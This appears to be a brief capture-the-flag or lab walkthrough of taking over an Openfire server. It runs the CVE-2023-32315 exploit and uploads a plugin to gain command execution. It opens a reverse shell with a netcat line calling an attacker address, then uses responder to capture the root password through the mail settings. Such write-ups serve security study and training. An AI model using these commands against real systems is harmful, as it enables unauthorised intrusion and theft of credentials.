9090
We have openfire.
Using this exploit
python3 CVE-2023-32315.py -u http://192.168.243.96:9090
We can login with hugme:hugmeNOW 
uploading openfire-management-tool-plugin.jar file from https://github.com/miko550/CVE-2023-32315 
Now in server->server settings->Management tool
Enter password 123:
We have command execution.
Using payload busybox nc 192.168.45.229 9090 -e bash: 
And listening using penelope:
We have a shell as openfire.
We can change admin password too: 
We can go to email settings:
We can change the host and save. The root password is already filled.
Run responder:
sudo responder -I tun0 -ANow send a test mail: 
We get the root password:
Now we can switch to root with su root:
We are root :)
Last updated
Was this helpful?